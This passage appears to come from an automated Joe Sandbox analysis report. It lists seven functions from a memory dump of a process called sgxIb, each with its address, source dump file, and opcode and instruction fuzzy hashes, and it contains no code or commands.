                                • Opcode ID: 0894247088519ffbdd6366d34d2cfe1377366bdf65ab6abc2a3a4c4862926ba4
                                • Instruction ID: 78bae51d57a3def60717218876b34f669632f192de5928c2d4b82075730a8aea
                                • Opcode Fuzzy Hash: 0894247088519ffbdd6366d34d2cfe1377366bdf65ab6abc2a3a4c4862926ba4
                                • Instruction Fuzzy Hash: 84016935B100241BDB6895AD9564B2FA3DBEBCA720F28C83EE60EC7384D966DD024791
                                Function 06CCF2C8 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c43499a0747e73e295b6aff724015a01c0ee31944cd82da71712485fbb1e479
                                • Instruction ID: 9138dc78c5182347c043c958428e848e4212de769cb145152d2e755d1f445976
                                • Opcode Fuzzy Hash: 2c43499a0747e73e295b6aff724015a01c0ee31944cd82da71712485fbb1e479
                                • Instruction Fuzzy Hash: 0C016935B100141BDB659A7DA454B2E67D6EBC9624F24883DE50ACB344EE65DD024392
                                Function 06CC40DF Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5a86700f476b5ca6be2f2571cbb8fc6c8964430cb0002284b043f0f6ecf92a2
                                • Instruction ID: 4dc50ab532e5cf76d968a48ffe36e35c00d05671eaea74b08777482d7316c5cc
                                • Opcode Fuzzy Hash: e5a86700f476b5ca6be2f2571cbb8fc6c8964430cb0002284b043f0f6ecf92a2
                                • Instruction Fuzzy Hash: 46016232B100144BDB58997D9C206AF76FAEBC8761F00813DD609E7240EE65DD1147E1
                                Function 06CCA430 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6269486a5588d7274326bbeb6f33813e4b11659ada9d7d89ed70ceea3c99d408
                                • Instruction ID: f11e3bfaee5699f2b6e8df8d47c85d907163b08d1c0dddf8ad30a838560fd78b
                                • Opcode Fuzzy Hash: 6269486a5588d7274326bbeb6f33813e4b11659ada9d7d89ed70ceea3c99d408
                                • Instruction Fuzzy Hash: 5B014430B104185FDB64DABCE958B6A73D6EB89724F10483DE20AD7754DE29ED0287D1
                                Function 06CCC907 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac55e5450492f97abeab560097af6a2d07ed0db15e48f428842e20d40c39369e
                                • Instruction ID: 1dd6a4d469029119eab862f5fee20f022a83d13ef900dcddd7ad375a9a8cb22a
                                • Opcode Fuzzy Hash: ac55e5450492f97abeab560097af6a2d07ed0db15e48f428842e20d40c39369e
                                • Instruction Fuzzy Hash: 6001F471B10228ABDF249A79EC80A9AB779FBC5364F00443DE905EB340DA36AC058BD0
                                Function 06CC83E8 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7690f37e920c8846273e762a2ee9a0087a646fa2da1b982a788975e4590ed30b
                                • Instruction ID: 88fa9dca792c753e4219c5dd9f089cc64b79d5b562cafd8fa4eddfd887a14d7e
                                • Opcode Fuzzy Hash: 7690f37e920c8846273e762a2ee9a0087a646fa2da1b982a788975e4590ed30b
                                • Instruction Fuzzy Hash: 99F0DC35B022009FDF64CE55EAA02AA7B69EB80260F00447EDA04EB251C739EA02CB81
                                Function 06CC6588 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c7092622ecad3f9c3fabc46241e60713281022759c4db9a362a6c0f3186f0e3
                                • Instruction ID: 30bcbf7aae8d94e79ea05d466d142461c9eb7be5cf173c367f4511f59a26fe48
                                • Opcode Fuzzy Hash: 6c7092622ecad3f9c3fabc46241e60713281022759c4db9a362a6c0f3186f0e3
                                • Instruction Fuzzy Hash: 86E061B0D042486FDF20CB71CD0576977BCD741124F6140EDD808D7207E131CB418791
                                Function 06CC4B69 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f96acdcd08dd3df545be41cf64c8ad739afe873e9adf46ed11aa7d0e7e3f596
                                • Instruction ID: dac0998435508b35ff59c76e63d84354fc30ce757b349d17e3cebefab33c234d
                                • Opcode Fuzzy Hash: 5f96acdcd08dd3df545be41cf64c8ad739afe873e9adf46ed11aa7d0e7e3f596
                                • Instruction Fuzzy Hash: 3BF0B730A54129EBDB14DB94E8A8BAEBBB2FF48714F208519E402A7294CB701D41CB80